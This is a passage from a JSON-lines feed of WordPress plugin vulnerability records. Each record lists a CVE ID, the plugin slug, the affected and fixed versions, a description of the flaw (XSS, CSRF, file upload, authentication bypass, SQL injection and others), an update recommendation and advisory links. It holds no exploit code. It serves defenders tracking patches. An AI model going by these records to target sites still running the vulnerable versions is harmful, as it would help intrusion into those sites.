version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-store-locator\\\/tags\\\/1.1.9\\\/includes\\\/init.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-store-locator\\\/tags\\\/1.1.9\\\/includes\\\/init.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206624%40themify-store-locator&new=3206624%40themify-store-locator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206624%40themify-store-locator&new=3206624%40themify-store-locator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/287abdef-24de-4e1b-a673-59cd37411bf6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/287abdef-24de-4e1b-a673-59cd37411bf6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13908","slug":"bws-smtp","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The SMTP by BestWebSoft plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_options' function in all versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bws-smtp\\\/tags\\\/1.1.8\\\/includes\\\/class-bwssmtp-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bws-smtp\\\/tags\\\/1.1.8\\\/includes\\\/class-bwssmtp-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250935\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250935\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f3b0637-b1ee-4e0b-95cd-11ac377805a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f3b0637-b1ee-4e0b-95cd-11ac377805a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8200","slug":"reviews-feed","versionImpact":"1.1.2","versionEndExcluding":"1.2.0","description":"The Reviews Feed \u2013 Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the 'update_api_key' function. This makes it possible for unauthenticated attackers to update an API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d9e20f7-813c-4691-bce4-d0ff4774ae48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d9e20f7-813c-4691-bce4-d0ff4774ae48?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviews-feed\\\/tags\\\/1.1.2\\\/class\\\/Common\\\/Builder\\\/SBR_Feed_Saver_Manager.php#L699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviews-feed\\\/tags\\\/1.1.2\\\/class\\\/Common\\\/Builder\\\/SBR_Feed_Saver_Manager.php#L699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125315\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8199","slug":"reviews-feed","versionImpact":"1.1.2","versionEndExcluding":"1.2.0","description":"The Reviews Feed \u2013 Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_api_key' function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update API Key options.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc3e89e5-2e7e-497e-b340-b787ebdf3711?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc3e89e5-2e7e-497e-b340-b787ebdf3711?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviews-feed\\\/tags\\\/1.1.2\\\/class\\\/Common\\\/Builder\\\/SBR_Feed_Saver_Manager.php#L699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reviews-feed\\\/tags\\\/1.1.2\\\/class\\\/Common\\\/Builder\\\/SBR_Feed_Saver_Manager.php#L699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125315\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13721","slug":"plethora-tabs-accordions","versionImpact":"1.1.8","versionEndExcluding":"1.2","description":"The Plethora Plugins Tabs + Accordions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the anchor parameter in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plethora-tabs-accordions\\\/trunk\\\/plethoraplugins-tabs.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plethora-tabs-accordions\\\/trunk\\\/plethoraplugins-tabs.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9755e5d4-dbf6-4778-84d6-cc967e8afb48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9755e5d4-dbf6-4778-84d6-cc967e8afb48?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5817","slug":"neon-text","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes (color). This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9998485-e272-48fc-b2f1-9e30158d0d16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9998485-e272-48fc-b2f1-9e30158d0d16?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/125xS3GVMr7_qo5HjWvXaXixuE_R-q_u3\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/125xS3GVMr7_qo5HjWvXaXixuE_R-q_u3\\\/view?usp=sharing\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984188%40neon-text&new=2984188%40neon-text&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984188%40neon-text&new=2984188%40neon-text&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2005-10002","slug":"secure-files","versionImpact":"1.1","versionEndExcluding":"1.2","description":"A vulnerability, which was classified as critical, was found in almosteffortless secure-files Plugin up to 1.1 on WordPress. Affected is the function sf_downloads of the file secure-files.php. The manipulation of the argument downloadfile leads to path traversal. Upgrading to version 1.2 is able to address this issue. The name of the patch is cab025e5fc2bcdad8032d833ebc38e6bd2a13c92. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-243804.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243804\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243804\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.243804\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.243804\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/secure-files\\\/commit\\\/cab025e5fc2bcdad8032d833ebc38e6bd2a13c92\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/secure-files\\\/commit\\\/cab025e5fc2bcdad8032d833ebc38e6bd2a13c92\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6272","slug":"tml-2fa","versionEndExcluding":"1.2","description":"The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03243ea-fee7-46e4-8037-a228afc5297a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a03243ea-fee7-46e4-8037-a228afc5297a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3167","slug":"mail-queue","versionEndExcluding":"1.2","description":"The Mail Queue plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924661\\\/mail-queue\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924661\\\/mail-queue\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4aaca22-76b9-42ec-a960-65d44d696324?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4aaca22-76b9-42ec-a960-65d44d696324?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11413","slug":"hostfact-bestelformulier-integratie","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The HostFact bestelformulier integratie plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bestelformulier' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hostfact-bestelformulier-integratie\\\/trunk\\\/hostfact-bestelformulier.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hostfact-bestelformulier-integratie\\\/trunk\\\/hostfact-bestelformulier.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24a33857-5df2-4747-950e-f5a87fd287c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24a33857-5df2-4747-950e-f5a87fd287c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3021","slug":"mhr-post-ticker","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The Mhr Post Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Header Title value in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f89bb45-2872-4081-a3b8-a1f11bbdbc55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f89bb45-2872-4081-a3b8-a1f11bbdbc55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074516%40mhr-post-ticker&new=3074516%40mhr-post-ticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074516%40mhr-post-ticker&new=3074516%40mhr-post-ticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077808%40mhr-post-ticker&new=3077808%40mhr-post-ticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077808%40mhr-post-ticker&new=3077808%40mhr-post-ticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1671","slug":"academist-membership","versionImpact":"1.1.6","versionEndExcluding":"1.2","description":"The Academist Membership plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.6. This is due to the academist_membership_check_facebook_user() function not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as any user, including site administrators.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/academist-a-modern-learning-management-system-and-education-theme\\\/22376830\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/academist-a-modern-learning-management-system-and-education-theme\\\/22376830\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/911a9550-1f62-4f28-9d8c-00d9769949c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/911a9550-1f62-4f28-9d8c-00d9769949c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1638","slug":"alloggio-membership","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The Alloggio Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly validating a user's identity through the alloggio_membership_init_rest_api_facebook_login and alloggio_membership_init_rest_api_google_login functions. This makes it possible for unauthenticated attackers to log in as any user, including administrators, without knowing a password.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alloggio-hotel-booking-theme\\\/26775539\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alloggio-hotel-booking-theme\\\/26775539\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60405e54-e869-4623-892c-0821014f887b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60405e54-e869-4623-892c-0821014f887b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11842","slug":"dn-shipping-by-weight","versionImpact":"1.1.1","versionEndExcluding":"1.2","description":"The DN Shipping by Weight for WooCommerce WordPress plugin before 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2545f054-b6ca-4ee5-ac6f-f42193db21b1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2545f054-b6ca-4ee5-ac6f-f42193db21b1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2545f054-b6ca-4ee5-ac6f-f42193db21b1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2545f054-b6ca-4ee5-ac6f-f42193db21b1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4896","slug":"wpb-elementor-addons","versionImpact":"1.0.9","versionEndExcluding":"1.2","description":"The WPB Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103dea33-0c30-460e-80e4-fead18928a62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103dea33-0c30-460e-80e4-fead18928a62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-elementor-addons\\\/trunk\\\/templates\\\/videos_grid.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-elementor-addons\\\/trunk\\\/templates\\\/videos_grid.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088737\\\/#file26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088737\\\/#file26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3328","slug":"custom-field-for-wp-job-manager","versionEndExcluding":"1.2","description":"The Custom Field For WP Job Manager WordPress plugin before 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b76875-cf7f-43a9-b88b-d8aefefab131\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b76875-cf7f-43a9-b88b-d8aefefab131\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6617","slug":"header-footer-code","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The NinjaTeam Header Footer Custom Code WordPress plugin before 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c5efe3c-95a8-4647-86c0-20aa7dd92b66\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c5efe3c-95a8-4647-86c0-20aa7dd92b66\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6493","slug":"header-footer-code","versionImpact":"1.1","versionEndExcluding":"1.2","description":"The NinjaTeam Header Footer Custom Code WordPress plugin before 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e3128ef-901a-42aa-9d74-c69d3241dc07\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e3128ef-901a-42aa-9d74-c69d3241dc07\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3063","slug":"wpb-elementor-addons","versionImpact":"1.0.9","versionEndExcluding":"1.2","description":"The WPB Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the output of 'tags' added to widgets in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied tag attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a832e2b-a900-4057-96fc-1bd6899e3950?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a832e2b-a900-4057-96fc-1bd6899e3950?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088737%40wpb-elementor-addons&new=3088737%40wpb-elementor-addons&sfp_email=&sfph_mail=#file44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088737%40wpb-elementor-addons&new=3088737%40wpb-elementor-addons&sfp_email=&sfph_mail=#file44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6000","slug":"fooevents","versionImpact":"1.19.20","versionEndExcluding":"1.19.21","description":"The FooEvents for WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary file uploads due to an improper capability setting on the 'display_ticket_themes_page' function in versions up to, and including, 1.19.20. This makes it possible for authenticated attackers with contributor-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in 1.19.20, and fully patched in 1.19.21.","recommendation":"Update to version 1.19.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1080810b-ec9a-44fb-b4da-49b28646a441?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1080810b-ec9a-44fb-b4da-49b28646a441?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/help.fooevents.com\\\/docs\\\/topics\\\/changelogs\\\/fooevents-for-woocommerce\\\/\",\"name\":\"https:\\\/\\\/help.fooevents.com\\\/docs\\\/topics\\\/changelogs\\\/fooevents-for-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5561","slug":"popup-maker","versionImpact":"1.19.0","versionEndExcluding":"1.19.1","description":"The Popup Maker  WordPress plugin before 1.19.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a87cc25-bd7d-40e3-96f9-26646cd6f736\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a87cc25-bd7d-40e3-96f9-26646cd6f736\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7054","slug":"popup-maker","versionImpact":"1.19.0","versionEndExcluding":"1.19.1","description":"The Popup Maker \u2013 Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018close_text\u2019 parameter in all versions up to, and including, 1.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73524687-7703-4912-aad5-2a31122ba9b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73524687-7703-4912-aad5-2a31122ba9b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137126\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137126\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1207","slug":"http-headers","versionEndExcluding":"1.18.8","description":"This HTTP Headers WordPress plugin before 1.18.8 has an import functionality which executes arbitrary SQL on the server, leading to an SQL Injection vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f3f460b-542a-4d32-8feb-afa1aef57e37\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f3f460b-542a-4d32-8feb-afa1aef57e37\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1208","slug":"http-headers","versionEndExcluding":"1.18.11","description":"This HTTP Headers WordPress plugin before 1.18.11 allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0cc6740-866a-4a81-a93d-ff486b79b7f7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0cc6740-866a-4a81-a93d-ff486b79b7f7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11851","slug":"nitropack","versionImpact":"1.17.0","versionEndExcluding":"1.17.6","description":"The NitroPack plugin for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the nitropack_rml_notification function in all versions up to, and including, 1.17.0. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to integers and not arbitrary values.","recommendation":"Update to version 1.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211235\\\/nitropack\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211235\\\/nitropack\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8945bae7-2224-4d9f-b693-10c94c94dea0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8945bae7-2224-4d9f-b693-10c94c94dea0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11848","slug":"nitropack","versionImpact":"1.17.0","versionEndExcluding":"1.17.6","description":"The NitroPack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nitropack_dismiss_notice_forever' AJAX action in all versions up to, and including, 1.17.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options to a fixed value of '1' which can activate certain options (e.g., enable user registration) or modify certain options in a way that leads to a denial of service condition.","recommendation":"Update to version 1.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211235\\\/nitropack\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211235\\\/nitropack\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e1b06d0-f348-4a8b-8730-a87d8e2ba2a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e1b06d0-f348-4a8b-8730-a87d8e2ba2a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
